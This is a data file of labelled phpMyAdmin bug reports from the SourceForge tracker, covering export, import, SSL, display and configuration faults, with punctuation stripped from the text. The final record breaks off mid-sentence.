"24444","9315","Empty string as a default value.
When setting the default value empty string) for the field it worsk well, but when edit this field pma shows it as NONE default value is not set).
And altering this field disables the default value.
phpMyAdmin 2.3.2, InnoDB does not tested on MyISAM) Original URL https sourceforge.net p phpmyadmin bugs 2949 Original author hexone","bug"
"24444","9316","Slide effect masks some fields on search page.
can t scroll to last fields when in search mode, see .pdf Please put selection of fields on top again to avoid this.
Original URL https sourceforge.net p phpmyadmin bugs 2976 Original author airtoi Found in version 3.2.5","bug"
"24444","9317","export view as sql includes INSERT INTO.
Exporting a complete database as sql worked fine in 3.2.2.1.
I could use such an export to recreate the database, including views.
In 3.2.5. it doesn t work.
The export now has sql code to insert data into views, not just to recreate a view s structure.
Trying to use such an export to recreate the database fails, because you can t insert data into a view, and the data is already inserted into the base tables.
Below is a small part of an example export.
`vStaff publications` isn t a table, but a view Tabelstructuur voor tabel `vStaff publications` DROP TABLE IF EXISTS `vStaff publications`; CREATE ALGORITHM=UNDEFINED DEFINER=`alfa` `localhost` SQL SECURITY DEFINER VIEW `clcg`.`vStaff publications` AS select `s`.`pub id` AS `pub id`,`s`.`staff id` AS `staff id`,`s`.`staff version` AS `staff version`,concat `s`.`staff id`, utf8 ,`s`.`staff version`) AS `person`,count 0) AS `n` from `clcg`.`staff publications` `s` join `clcg`.`staff publications` `t`) where `s`.`pub id` = `t`.`pub id`) group by `s`.`pub id`,`s`.`staff id`,`s`.`staff version`; Gegevens worden uitgevoerd voor tabel `vStaff publications` INSERT INTO `vStaff publications` `pub id`, `staff id`, `staff version`, `person`, `n`) VALUES 1, 62, 1, 62 1 , 2), 1, 70, 1, 70 1 , 2), 2, 70, 1, 70 1 , 1), Original URL https sourceforge.net p phpmyadmin bugs 2978 Original author peterkleiweg Found in version 3.3.0","bug"
"24444","9318","Blowfish secret is not hashed.
I set a blowfish secret for cookie authentication that was longer than 56 bytes, which is the maximum size for blowfish.
Then phpmyadmin fails with showing an empty page and this is shown in the error log entry 2009 11 24 13 56 21 mod fastcgi.c.2618) FastCGI stderr PHP Warning mcrypt encrypt ) [ lt;a href= function.mcrypt encrypt gt;function.mcrypt encrypt lt; a gt;] Size of key is too large for this algorithm in usr share phpMyAdmin libraries mcrypt.lib.php on line 71 PHP Fatal error mcrypt encrypt ) [ lt;a href= function.mcrypt encrypt gt;function.mcrypt encrypt lt; a gt;] Mcrypt initialisation failed in usr share phpMyAdmin libraries mcrypt.lib.php on line 71 For further information, please see https bugzilla.redhat.com show bug.cgi?id=540891 Original URL https sourceforge.net p phpmyadmin bugs 2950 Original author robert scheck Found in version 3.2.3","bug"
"24444","9319","ODS incorrect DECIMAL fields.
When exporting a table to Open Document Spreadsheet format, DECIMAL fields are formatted incorrectly.
The solution to this bug is simple have them exported as if they were a DOUBLE field.
The bug is related to https sourceforge.net tracker index.php?func=detail aid=2821833 group id=23067 atid=377408 which addressed similar bugs in exporting date and time fields.
Also https sourceforge.net tracker index.php?func=detail aid=2856664 group id=23067 atid=377410 touches the issue.
Original URL https sourceforge.net p phpmyadmin bugs 2951 Original author jknockaert Found in version 3.5.6","bug"
"24444","9320","ShowServerInfo should hide all server info.
I m quite sure I ve asked about this before at some point.. but when downloading 3.2.4 and installing it, I see it s still there.
How do we disable Status Variables Charsets Engines Processes to be available from the Main frame top?
Also, how do we disable disclosure of Webserver and Database server information?
Both ShowServerInfo and ShowPhpInfo is set to FALSE.
ShowStats is also false.
Also, how do we disable a link to phpMyAdmin documentation?
Something that very few users actually need use want.
Original URL https sourceforge.net p phpmyadmin bugs 2952 Original author joho68 Found in version 3.2.4","bug"
"24444","9321","Table size for ARCHIVE tables is not displayed.
When I try to view the size of a table which is using the ARCHIVE storage engine, the Size field under the Structure heading of the database is being displayed as unknown yet when I go to the informationschema or run SHOW TABLE STATUS, a value for the Data length column is returned.
Original URL https sourceforge.net p phpmyadmin bugs 2953 Original author quick6066 Found in version 3.2.2","bug"
"24444","9322","MySQL connection with SSL fails.
PHP mysqli mysql connect fails to shake with SSL enabled required MySQL server 5.0.51a).
MYSQL CLIENT SSL MYSQLI CLIENT SSL parameter is found to not work correctly.
Work around for mysqli real connect ) is to place the following after in place of line 93 for .
libraries dbi mysql.dbi.lib.php mysqli ssl set link, GLOBALS[ cfg ][ Server ][ sslkey ], GLOBALS[ cfg ][ Server ][ sslcert ], GLOBALS[ cfg ][ Server ][ sslca ], GLOBALS[ cfg ][ Server ][ sslcapath ], GLOBALS[ cfg ][ Server ][ sslcipher ]); Populate the .
config.inc.php with the listed config options.
Config options sslcapath and sslcipher can be set to NULL.
I have not looked at a work around for mysql connect ).
Original URL https sourceforge.net p phpmyadmin bugs 2954 Original author mskeoch Found in version 3.5.6","bug"
"24444","9323","search produce an invalid query SQL order by NULL).
Only with table see desc in attach) a simple search produce a not valid SQL quesry, the error seems produced by ORDER BY option, I do not understand why ohomyadmin add this option not selected.. best regards Alessandro query SQL Documentazione SELECT `cod` , `name` , `surname` , `company` , `web` , `email` , `emailnews` , `emailinvoice` , `emailsys` , `passw` , `phone1` , `phone mode1` , `phone2` , `phone mode2` , `phone3` , `phone mode3` , `phone4` , `phone mode4` , `mobile` , `fax` , `address` , `zipCode` , `city` , `province` , `country` , `CF` , `national prefix` , `VAT` , `balance` , `deposit` , `supplier` , `admin` , `privato` , `bene` , `pagamento` , `bank abi` , `bank cab` , `invoice send by` , `associazione` , `sendpw` , `sconto` , `reseller` , `reseller username` , `reseller crypt` , `agente` , `mouse` , `active` , `nonews` , `care` , `careweb` , `policy` , `caredate` , `care ore` , `care ore init` , `care fee yearly` , `care fee monthly` , `care responce hours` , `care responce hours remote` , `privacy` , `privacy log` , `checkcode` , `promo` FROM `user` ORDER BY LIMIT 0 , 30 Messaggio di MySQL Documentazione 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near LIMIT 0, 30 at line 2 Original URL https sourceforge.net p phpmyadmin bugs 2955 Original author lota Found in version 3.2.4","bug"
"24444","9324","mysql extension not found on fedora core 11.
In my system mysql and mysqli extensions to are loaded dynamically during runtime.
phpMyAdmin does not seem to load them dynamically, but instead reports an error Cannot load mysql extension.
In my system I fixed this with adding the following to common.inc.php if !
extension loaded mysqli )) \{ dl mysqli.so ); \} My system is fedora core 11 64bit), php mysql installed through yum packages, installing phpMyAdmin 3.2.4) from tarball.
Original URL https sourceforge.net p phpmyadmin bugs 2956 Original author tentennek Found in version 3.2.4","bug"
"24444","9325","Cannot rename db which has foreign key constraints.
If I have an InnoDB DB with foreign key constraints, and the constraints on the tables are not in alphabetical order, an error will occur saying a table cannot be deleted in the old DB.
Original URL https sourceforge.net p phpmyadmin bugs 2958 Original author micah26 Found in version 3.2.4","bug"
"24444","9326","Name Engine MRG MYISAM different for MySQL 5.1.x.
Starting MySQL version 5.1.x, the Engine parameter of a merge table has changed to MRG MYISAM all capitals).
In MySQL 5.0.x and previous the engine name was MRG MyISAM.
This breaks some small features when using PMA with a MySQL 5.1.x database Database gt; Operations db operations.php) error when copying database Database gt; Structure db structure.php) calculating table size Table gt; Structure tbl structure.php) showing details disk usage of index, ...) Table gt; Printview tbl printview.php) see Table gt; Structure Tested with MySQL 5.1.31 and MySQL 5.0.45 Solution Cleanest way seems to add an isMergeTable to the PMA Table class like isView) and use this check in the rest of the code.
What is the best name for such a function?
isMergeTable , isMerge , isMRG MyISAM , isMRG MYISAM Should the Engine and Type parameter of a PMA Table be MRG MyISAM or MRG MYISAM , regardless of the MySQL server version?
Original URL https sourceforge.net p phpmyadmin bugs 2991 Original author ruleant Found in version Latest Git","bug"
"24444","9327","Copy database shows errors when DB has foreign key.
Copy database is showing an error when you click add constraints and the DB has a foreign constraint.
The error is not being shown as the error window is a fixed size.
This is also happening in 3.2.5 rc1 Original URL https sourceforge.net p phpmyadmin bugs 2959 Original author micah26 Found in version 3.2.4","bug"
"24444","9328","Cannot import French interface).
Clicking Exxc3xa9cuter go) while importing a CSV file produces nothing and generates a Javascript error in the Firefox console.
Original URL https sourceforge.net p phpmyadmin bugs 2960 Original author lem9 Found in version 3.3.0","bug"
"24444","9329","ok 4.1.2) Relations settings not updated on config change.
Once user changes configuration file, configuration is reloaded, however detected relations are not.
This leads to various breakages in case relations were configured and user disabled them later eg.
by removing pmadb configuration option).
The solution could be to unset SESSION[relation ] on detected configuration change.
Original URL https sourceforge.net p phpmyadmin bugs 2961 Original author nijel Found in version 4.1.1","bug"
"24444","9330","Unhex not used by default for binary fields.
On edit, unhex is used by default.
But on insert, this isn t done.
Yet.
Could you do this?
Original URL https sourceforge.net p phpmyadmin bugs 2995 Original author olafvdspek Found in version 3.3.1","bug"
"24444","9331","Editing long triggers.
In my case, i had a very long trigger for mysql.
so i needed to edit that trigger but the querystring was too damn long.
the simplest way i could think to solve it was this file libraries tbl triggers.lib.php near line 34 added SESSION[ session sql ] = drop and create; near line 45 changed this lt;a href= tbl sql.php?
.
url query .
amp;amp;sql query= .
urlencode drop and create) .
amp;amp;show query=1 amp;amp;delimiter= .
urlencode delimiter) .
gt; .
titles[ Change ] .
lt; a gt; , for this lt;a href= tbl sql.php?
.
url query .
amp;amp;sql query= .
session sql=1 amp;amp;show query=1 amp;amp;delimiter= .
urlencode delimiter) .
gt; .
titles[ Change ] .
lt; a gt; , so now the query is saved in a session var, and doesnt travel via GET in the file libraries sql query form.lib.php near line 80 changed this if true === query) \{ query = GLOBALS[ sql query ]; \} for this if true === query) \{ if GET[ session sql ]) \{ query = SESSION[ session sql ]; \} else \{ query = GLOBALS[ sql query ]; \} \} problem solved, i hope this helps anyone it attaching both files, this is phpMyAdmin 2.11.8.1deb5 lenny1 Original URL https sourceforge.net p phpmyadmin bugs 2962 Original author hardcodear Found in version 2.11.8","bug"
"24444","9332","Seeing m as unit is confusing.
In server status, I see this show grants 2 0.02 0.00 show variables 2 0.02 0.00 show status 1 8.82 m 0.00 show master status 1 8.82 m 0.00 What s the m postfix of 8.82?
Can t be mega... Milli?
That d be too confusing.
Original URL https sourceforge.net p phpmyadmin bugs 2963 Original author olafvdspek Found in version 3.3.0","bug"
"24444","9333","Table filter box too wide.
The table filter box is too wide when a scrollbar is shown.
It would be nice if it adapted automatically to the client width.
Original URL https sourceforge.net p phpmyadmin bugs 2964 Original author olafvdspek Found in version 3.3.0","bug"
"24444","9334","ForceSSL in config, crashes phpmyadmin.
In libraries Config.class.php, line 795; the static variable is tppts is set to false.
In the next test, it passes always), as null !== false So the redirect goes around, and around, and https becomes httpss, httpsss, httpsss,.....
Suggest change static declaration to be static is https = null; Seen on PHP version 5.3.0 Original URL https sourceforge.net p phpmyadmin bugs 2965 Original author firstlaunch Found in version Latest Git","bug"
"24444","9335","JS bookmarking broken in Chrome.
Chrome seems to load child frames earlier than processes parent javascript what leads to infinite reload with existing solution.
It should be converted to more event driven to avoid this problem.
Original URL https sourceforge.net p phpmyadmin bugs 2966 Original author nijel Found in version Latest Git","bug"
"24444","9336","information schema sorting order.
information schema is not sorted properly when the NaturalOrder directive is set to false.
Same problem when the only db directive is used.
Original URL https sourceforge.net p phpmyadmin bugs 2967 Original author lem9 Found in version 3.2.5","bug"
"24444","9337","Excel 97 2003 exports and temporary directory.
When attempting an Excel 97 2003 XLS Woorkbook export, one gets [Fri Mar 19 15 55 41 2010] [error] [client 130.238.131.137] PHP Fatal error Uncaught exception Exception with message Can t create temporary file in apache htdocs hotel phpMyAdmin 3.3.1 all languages libraries PHPExcel PHPExcel Shared OLE OLE File.php 98\nStack trace \n 0 apache htdocs hotel phpMyAdmin 3.3.1 all languages libraries PHPExcel PHPExcel Writer Excel5.php 190) PHPExcel Shared OLE PPS File gt;init )\n 1 apache htdocs hotel phpMyAdmin 3.3.1 all languages libraries export xls.php 62) PHPExcel Writer Excel5 gt;save tmp pma xls mZ... )\n 2 apache htdocs hotel phpMyAdmin 3.3.1 all languages export.php 568) PMA exportFooter )\n 3 \{main\}\n thrown in apache htdocs hotel phpMyAdmin 3.3.1 all languages libraries PHPExcel PHPExcel Shared OLE OLE File.php on line 98 It appears that a temporary file was created, but with zero size, listing tmp rw 1 web web 0 2010 03 19 15 55 pma xls mZmeaz The zero size file is most probably generated by initialize ) in libraries PHPExcel PHPExcel Writer Excel5 Worksheet.php, which is called by save ) in libraries PHPExcel PHPExcel Writer Excel5.php.
However, the latter function also later) calls OLE gt;init ), which in init ) in libraries PHPExcel PHPExcel Shared OLE OLE File.php will attempt to fopen ) a temporary file not necessarily the same!).
The temporary file name is composed of a tempnam ) call specifying this gt; tmp dir as the directory, but as phpMyAdmin doesn t seem to have called OLE gt;setTempDir ), the directory is empty, The outcome of that is supposedly undefined the PHP docs for tempnam ) only mentions that If PHP cannot create a file in the specified dir parameter, it falls back on the system default.
which may differ, and in our case on our platform), seems to be broken http bugs.php.net bug.php?id=42560 The best way to solve this awaiting the PHP fix for our platform) would be to make sure that phpMyAdmin calls setTempDir to make sure that the temporary directory for PHPExcel is always explicitly set to the same value as cfg[ TempDir ] of the phpMyAdmin configuration.
Attaching a diff for libraries export xls.php for that.
Original URL https sourceforge.net p phpmyadmin bugs 3004 Original author bwiberg Found in version 3.3.1","bug"
"24444","9338","SQL History.
SQL History does not show history.
I ve tried debugging a bit.
SESSION[ sqlhistory ][key] is create after running the SQL statements.
However, after clicking onto next page, this SESSION[ sqlhistory ][key] is no longer available.
The change in 3.2.4 to 3.2.5 introduced this bug.
I have tried gt;3.2.5, it all produces this but not 3.2.4.
Test Case Select a random table in a database Open Query Window gt; SQL History SQL History should show the first SELECT statement, but it doesn t. Further selecting other tables doesn t show up in history too.
Original URL https sourceforge.net p phpmyadmin bugs 3005 Original author techrix Found in version 3.2.5","bug"
"24444","9339","non binary fields shown as hex.
PMA v3.3.0 MySQL Server 5.0.51a 24 lenny3 log Apache 2.2.14 7 PHP v5.2.6 1 lenny8 PHP Extension mysqli The following query executed using the SQL tab always returns data in HEX SELECT INET NTOA 2130706433) = gt; 3132372e302e302e31 Where, of course, this is nothing more than plain ascii 127.0.0.1 Possibly due to this change https sourceforge.net tracker index.php?func=detail aid=2308632 group id=23067 atid=377410 Original URL https sourceforge.net p phpmyadmin bugs 3006 Original author slesimple Found in version 3.3.1","bug"
"24444","9340","Database structure not sorted by Table correctly.
see attached image.
Table sorting works fine on the left hand side, however on the main page tables are not sorted correctly when there is a number in them.
This makes finding the latest table harder.
Web server Apache 2.2.11 Ubuntu) PHP 5.2.9 0.dotdeb.2 with Suhosin Patch mod ssl 2.2.11 OpenSSL 0.9.8g MySQL client version 5.0.75 PHP extension mysqli MySQL Server Localhost via UNIX socket Server version 5.0.75 0ubuntu10.2 log Protocol version 10 User root localhost MySQL charset UTF 8 Unicode utf8) Hopefully this is enough information.
Original URL https sourceforge.net p phpmyadmin bugs 2968 Original author ofdan Found in version 3.2.5","bug"
"24444","9341","oK 3.2.6)import timeout when table already created.
When I import a sql file comporting a CREATE TABLE statement without DROP one and lot of data for this table, phpmyadmin timeout rendering a blank page or not able to allocate memory.
exemples create a table with sql file BDD struct1.sql try to import again the same file Result phpMyAdmin report an error that the table is already created create a table with sql file BDD struct1.sql try to import a file that create same table and insert 3 lines BDD struct data1 3data.sql) Result phpMyAdmin report an error that the table is already created create a table with sql file BDD struct1.sql try to import a file that create same table and insert 687 lines BDD struct data1 687data.sql) Result blank page or memory allocation error after several minutes create a table with sql file BDD struct1.sql try to import a file that only insert 687 lines BDD data1 687.sql) Result 687 line inserted correctly tested with two config phpmyadmin Version 3.1.3.2 Apache 2.2.11 MySQL 5.1.34 and phpMyAdmin Version 3.2.4 Apache 2.2.3 Version du client MySQL 5.0.32 Original URL https sourceforge.net p phpmyadmin bugs 2969 Original author shadow walker Found in version 3.2.5","bug"
"24444","9342","SQL ORDER BY.
phpMyAdmin 2.11.9.3 xd0x92xd0xb5xd1x80xd1x81xd0xb8xd1x8f MySQL xd0xbaxd0xbbxd0xb8xd0xb5xd0xbdxd1x82xd0xb0 5.0.85 I use query like SELECT FROM `main` WHERE text like xd1x80xd1x83xd1x81xd1x81xd0xbaxd0xb8xd0xb9 xd1x82xd0xb5xd0xbaxd1x81xd1x82 ORDER BY `main`.`datetime` DESC When I press column header for change sort order I get an error query SQL SELECT FROM `main` WHERE text like xd1x80xd1x83xd1x81xd1x81xd0xbaxd0xb8xd0xb9 xd1x82 ORDER BY `main`.`phone` ASC Original URL https sourceforge.net p phpmyadmin bugs 2970 Original author buhsoft","bug"
"24444","9343","Slider hides page footer on table structure.
The slider effect hides also page footer eg.
link for opening new phpMyAdmin window).
This part should not be hidden.
Original URL https sourceforge.net p phpmyadmin bugs 3015 Original author nijel","bug"
"24444","9344","Cannot unset string offsets when session expired.. PMA Version phpMyAdmin 3.2.5 all languages PHP Version 5.2.3 When using Cookie authentication, an expired session will lead to the following error when you log back in and try to modify a record Fatal error Cannot unset string offsets in phpMyAdmin 3.2.5 all languages libraries common.inc.php on line 947 To reproduce it, login to a PMA install using cookie authentication and leave it open in your browser for a time period longer than whatever is set for LoginCookieValidity and session.gc maxlifetime .
When you then click on a table name, it will pop you back to the main login screen correctly).
After you log back in, you will be able to click a table and browse it s contents, but when you click on the Edit link for a record, the right frame just loads the above Fatal error.
Nothing is generated in the Apache error log at the time that this occurs.
Closing and re opening the browser and or clearing your browser cookies for the phpMyAdmin server usually fixes the problem.
I think that s everything important, but let me know if you need any other information.
Original URL https sourceforge.net p phpmyadmin bugs 2971 Original author hosstito Found in version 3.2.5","bug"
"24444","9345","InnoDB storage page emits warning.
Warning in .
libraries common.lib.php 1501 number format ) expects parameter 1 to be double, string given Backtrace .
libraries common.lib.php 1501 number format string ON, integer 0, ) .
libraries StorageEngine.class.php 186 PMA formatNumber string ON) .
server engines.php 142 PMA StorageEngine gt;getHtmlVariables ) Can be seen on MariaDB demo server http demo.phpmyadmin.net trunk config server engines.php?engine=InnoDB server=2 Original URL https sourceforge.net p phpmyadmin bugs 3017 Original author nijel Found in version 3.3.2","bug"
"24444","9346","Can t detect PmaAbsoluteUri correctly on windows.
in Config.class.php checkPmaAbsoluteUri ) can detect the PmaAbsoluteUri, but it dependence on PMA IS WINDOWS, but PMA IS WINDOWS didn t initialized before loading config, since it can t convert backslash to slash, pma got a wrong PmaAbsoluteUri such as http example.org\ causes many action goes wrong.
to resolve this bug need use checkWebServerOs ) initialize PMA IS WINDOWS before load config, or redetect the PmaAbsoluteUri again after using checkWebServerOs ) Original URL https sourceforge.net p phpmyadmin bugs 2973 Original author rimyxp Found in version 3.3.0","bug"
"24444","9347","Extraneus dot from dirname ) when webroot.
in the libraries Config.class.php, line 665 683, there is a serious mistake.
if you use www.example.com as PMA root dir, you access the url and login, the uri will become www.example.com.
which is appended with a unnecessary dot.
the reason is that line 642 659 get pma absolute uri = www.example.com, line 665 678 get path = .
, so line 683 concat them as www.example.com.
in fact, line 665 678 is the worst codes i have never seen.
if you put your in www.example.com pma, it will still generate path = .
because of line 676 s two dirname.
so it will redirect you to www.example.com.
index.php?xxxxx but not www.example.com.
pma index.php?xxxx bug is tested under nginx 8.32 php 5.2.12 php fpm 0.6, just remove relevant codes will fix the problem.
Original URL https sourceforge.net p phpmyadmin bugs 2975 Original author ayanamist Found in version 3.3.0","bug"
"24444","9348","Editing binary fields thuncates them.
Hello Basically if you have a binary field which stores binary data let s say for example as the raw binary output of php s hash ) function), this is displayed fine, however when you try to edit it to copy paste one field into another for instance, but more seriously when importing a db backup, the binary data is not inserted correctly, but rather truncated.
I have tried using the asii, binary, and hex functions in phpmyadmin, but they do not fix the issue, and I do not use them in my queries anyway.
I ll attach 3 things.
First is a screenshot of the problem in action copying the binary value of field 5 into 4).
Second and third i ll attach a schema and a php file i am using to test this.
Simply use the php file to insert two different binary passwords, and try to copy one over into the other field through phpmyadmin.
There should be a way to do this, because as it stands it s not possible to properly import database backups through phpmyadmin which contain this sort of data.
Thanks Original URL https sourceforge.net p phpmyadmin bugs 2977 Original author starcraftmazter","bug"
"24444","9349","Chrome Left Panel Resize Issue.
Unable to resize the left panel frame) in Google Chrome.
Original URL https sourceforge.net p phpmyadmin bugs 2979 Original author nerdsoftech Found in version Latest Git","bug"
"24444","9350","Copy Table > SQL error.
When copying a Table Structure only or Structure and data ) in Operations you get an SQL error because PMA tries to execute this query lt;a href= http dev.mysql.com doc refman 5.1 de create table.html target= mysql doc gt;CREATE TABLE lt; a gt; `data`.`test2` `test` lt;a href= http dev.mysql.com doc refman 5.1 de numeric types.html target= mysql doc gt;int lt; a gt; 10 ) NOT NULL ) ENGINE = MyISAM DEFAULT CHARSET = utf8 Version 3.4.0 dev Original URL https sourceforge.net p phpmyadmin bugs 2980 Original author virsacer Found in version 3.4.0","bug"
"24444","9351","Bug 2905629 not properly fixed.
The number 1 rule of encryption keys is that you DO NOT hash them.
The proper fix is to find the maximum length of the key, then use substr ) to truncate the key.
Using md5 ) is a completely inane way to fix said bug.
Original URL https sourceforge.net p phpmyadmin bugs 2981 Original author anonymous","bug"
"24444","9352","Import tab fails twice.
When opening the db import tab I got redirected to the login page.
The import upload iframe has a src= import.php without any parameters such as token).
which leads to an authentication failure.
Either the src attribute could be removed or PMA generate common url ) has to be added.
To make it more interesting, opera failed to submit the import form...
I ll have to look into that abit more.
Original URL https sourceforge.net p phpmyadmin bugs 2982 Original author helmo Found in version 3.3.0","bug"
"24444","9353","Field attributes use inline CSS.
During the development of a new visual theme for phpMyAdmin I ve found that field attributes are defined using inline CSS.
Usually, it is `style= font size 70 ; `.
I strongly believe it should be replaced with a CSS rule.
`.field attribute`, for example.
Let me demonstrate the code tbl structure.php) Editing a table fields lt;select style= font size 70 ; name= field attribute[0] id= field 0 6 gt; lt;option value= gt; lt; option gt; lt;option value= BINARY gt;BINARY lt; option gt; lt;option value= UNSIGNED selected= selected gt;UNSIGNED lt; option gt; ....
I added to my theme `select field 0 6 \{ font size 130 \}` but it works for the first field only.
Multiple fields generate SELECT tags with IDs field 1 6, field 2 6 etc.
and it produces the trouble.
The same for page with a table structure tbl structure.php) lt;td nowrap= nowrap style= font size 70 gt;UNSIGNED lt; td gt; In this case I can t even apply a CSS rule.
Original URL https sourceforge.net p phpmyadmin bugs 3040 Original author glossword team Found in version 3.3.3","bug"
"24444","9354","unknown table status TABLE TYPE.
This message happens after copying a table from Operations.
Original URL https sourceforge.net p phpmyadmin bugs 2983 Original author lem9 Found in version 4.0.9","bug"
"24444","9355","ODS import and accented characters.
Importing an ODS file exported via phpMyAdmin and containing accented characters breaks these characters.
This file, when viewed with Open Office, is correct.
Original URL https sourceforge.net p phpmyadmin bugs 2984 Original author lem9 Found in version 3.3.0","bug"
"24444","9356","Import not working with Opera Browser.
I found the the table import featur is not working with version 3.3.0.rc1.
Tested with 3.2.3 and it works ok. with version 3.3.0.rc1 and three different themes, original, darkblue orange and clearview3 you click on ok button after selecting a csv file and it takes no action, there is no response.
I m using Opera Version 10.10, different PMA versions 2,11,9, 2.11.9, 3, 3.2.3 and 3.3.0.rc1) all work fine except 3.3.0.rc1 My server is using Apache 2.2.11 Win32), PHP 5.2.9 2 and MySql 5.0.51a Original URL https sourceforge.net p phpmyadmin bugs 2985 Original author yacar suscri Found in version 3.3.0","bug"
"24444","9357","merged tables not exported correctly.
When exporting a database structure data), the data of a merged table is exported twice, first in the merged table and afterwards the data of the tables that are merged.
When importing the export file again in the database this gives possibly two errors depending on the order of the tables) case 1 merged wrong1.sql) 1168 Unable to open underlying table which is differently defined or of non MyISAM type or doesn t exist The merged table is created first the underlying tables are not yet created).
When inserting the values into the merged table, this error occurs, because there is no table to store the values in BTW Creating the merged table when the underlying tables are not present doesn t provoke an error case 2 merged wrong2.sql) 1062 Duplicate entry 9 for key 1 In this case the merged table is created after the underlying tables, but this time the data is already inserted when the underlying tables were created), causing a duplicate entry when the same data is inserted again.
When there are no keys that might provoke a duplicate entry error, the merged table would contain all data twice.
Solution Don t export data of a merged table MRG MyISAM), similar to the solution of bug 1221359 https sourceforge.net tracker ?func=detail aid=1221359 group id=23067 atid=377408), in db operations.php line 113 122 btw mysqldump doesn t export the data of a merged table merged correct.sql) Original URL https sourceforge.net p phpmyadmin bugs 2986 Original author ruleant Found in version Latest Git","bug"
"24444","9358","Querying a table named data .
Bug 1783620 Subquery results without \ as\ are ignored is marked Fixed Closed, but the bug repeats in phpMyAdmin 3.2.2 rc1, 3.2.5 and 3.3.0 rc 1\.
Query SELECT FROM data d displays correct rowset, but upper page title becomes localhost db name d .
There s no table d , so link d is invalid, 2\.
Query SELECT FROM data d WHERE TRUE; is simply ignored as described in Bug 1783620.
Workaround is to remove alias or add AS.
Config Apache 2.0.49 Win32), MySQL 5.1.30 community, PHP 5.2.13.
Original URL https sourceforge.net p phpmyadmin bugs 2987 Original author fedushin","bug"
"24444","9359","Potential information disclosure at login page.
There are several good checks made at the login page, but one seems to show a tad too much information.
If I enter invalid credentials, phpMyAdmin shows me the output from the MySQL login attempt like this 1045 Access denied for user 2e2e localhost using password YES) It s really none of the user s business which MySQL server we re trying to access at this point.
Nowhere do I display a list of servers to choose from, nor do I display any hostnames.
Granted, there isn t much I can do with this information, but it gives me a clue as to how the MySQL server configuration looks behind phpMyAdmin is it running on this server, and so on).
Original URL https sourceforge.net p phpmyadmin bugs 2988 Original author joho68 Found in version 3.3.0","bug"
"24444","9360","parentheses in enum not parsed correctly.
If you have an enum that contains parentheses, the structure page does not show the entire enum.
Original URL https sourceforge.net p phpmyadmin bugs 2989 Original author anonymous Found in version 3.2.2","bug"
"24444","9361","Import page not displaying due to fatal error.
When trying to view the import form, I always get only the top menu and the form is not displayed.
Viewing the source code reveals the problem, there is PHP Fatal error Call to undefined function PMA showDocu ) in E \Apache\htdocs\PHPMyAdmin\libraries\display import.lib.php on line 101.
Original URL https sourceforge.net p phpmyadmin bugs 2990 Original author anonymous Found in version 3.3.0","bug"
"24444","9362","Saved Limit.
Screen in attachment.
How to change limit of results, when I set 10000000?
PL.
Nie znam sixc4x99 na angielski, lecz bug jest taki, ixc5xbc jak ustawixc5x82em wczexc5x9bniej limit na 30000000 to juxc5xbc tego nie moge zmienixc4x87.
Limit sixc4x99 zapisaxc5x82 w phpmyadminie moze cookie lub gdzie indziej).
Jak wylogowuje i sie znow zaloguje to to samo jest.
Po prostu nie chce sie przywrocic by znow byl limit na 30.
Original URL https sourceforge.net p phpmyadmin bugs 2992 Original author bordeux Found in version 3.3.1","bug"
"24444","9363","Setup and tracking feature.
Setup mechanism does not support the various tracking directives.
Original URL https sourceforge.net p phpmyadmin bugs 2993 Original author lem9 Found in version 3.3.0","bug"
"24444","9364","Text shown as hex.
When I use propose table structure , the fields field name and optimal field type are shown as hex instead of as text.
This is related to the recent change to display binary fields as hex.
How does pMA determine what is a binary field?
Original URL https sourceforge.net p phpmyadmin bugs 2994 Original author olafvdspek Found in version 3.3.1","bug"
"24444","9365","INSERTed rows count is 0 with pmadb features.
1\.
Installed phpMyAdmin 3.3.0, copied own config.inc.php to its root attached).
2\.
Created table `aaa` with 1 field, PK AUTOINC.
3\.
Ran SQL INSERT INTO aaa VALUES ); , green success DIV showed 1 row s) inserted.
Inserted row id 1 Query took 0.0273 sec ) 4\.
Imported .
scripts create tables.sql, 5\.
Uncommented pmadb things in config.inc.php started new browser session, 6\.
Ran SQL INSERT INTO aaa VALUES ); again, green success DIV showed 0 row s) inserted.
Inserted row id 1 Query took 0.0302 sec ) Original URL https sourceforge.net p phpmyadmin bugs 2996 Original author fedushin","bug"
"24444","9366","Go to the upper level after table DROP.
1\.
I selected table `aaa` in DB `arcadius`.
Upper DIV serverinfo showed localhost arcadius aaa , 2\.
Dropped table `aaa`.
Upper DIV remained the same; link aaa in it became invalid.
The correct behaviour is to go one level up select parent database).
Original URL https sourceforge.net p phpmyadmin bugs 2997 Original author fedushin","bug"
"24444","9367","Table filter field loses focus in IE8 and Opera 10.5.
As expected, if you pause for a certain amount of time while typing text into the filter, the event fires.
However, once this happens, the field loses focus in both Internet Explorer 8 and Opera 10.5, but not Firefox 3.6 although, in Firefox s case, while the caret is no longer displayed, you can continue typing).
If you made a typo or the table you were looking for isn t in the filtered results, this becomes a bit of an annoyance.
Original URL https sourceforge.net p phpmyadmin bugs 2998 Original author cl1mh4224rd Found in version 3.3.0","bug"
"24444","9368","tbl addfield.php required mootools more.js.
On checking my apache error log, for another reason, I noticed that since loading 3.3.0 a few days ago, that errors are appearing for tbl addfield.php requiring mootools more.js.
Have checked all distributions for this version but this javascript library doesn t exist with the distribution zip file).
Original URL https sourceforge.net p phpmyadmin bugs 2999 Original author iasgoscouk Found in version 3.3.0","bug"
"24444","9369","Copy table thrashes original table s foreign keys.
I m using phpmyadmin 3.2.5 to maintain a table with a lot of foreign keys.
After using the copy database to option to create a test copy of the database, my test copy has all the correct keys set, but all foreign keys in the original table have been removed.
This strikes me as a particularly big issue since you don t expect a copy operation to affect the original at all, so nobody will be checking it.
kind regards, Michael Original URL https sourceforge.net p phpmyadmin bugs 3000 Original author michaelclerx","bug"
"24444","9370","Import menu tab not present on main page.
Since 3.3.0, a typo in the code made this button disappear from the main page.
Original URL https sourceforge.net p phpmyadmin bugs 3001 Original author lem9 Found in version 3.3.1","bug"
"24444","9371","incorrect table results in browse.
When selecting browse some tables show junk.
I have a varchar 32 field with plaint text in it, in browse it displays as bunch of numbers.
it seems only one column is affected, the rest appear ok. if i select an entry, the correct text in that field is displayed, so this seems to only affect the browse database 3.3.1 en from source.
Original URL https sourceforge.net p phpmyadmin bugs 3002 Original author noelb Found in version 3.3.2","bug"
"24444","9372","Excel 97 2003 exports and include path.
As of 3.3.1, an Excel 97 2003 XLS Workbook export yields the following error message and I ve been told imports do, too) Fatal error require once ) Failed opening required PHPExcel Shared JAMA utils Error.php include path= .
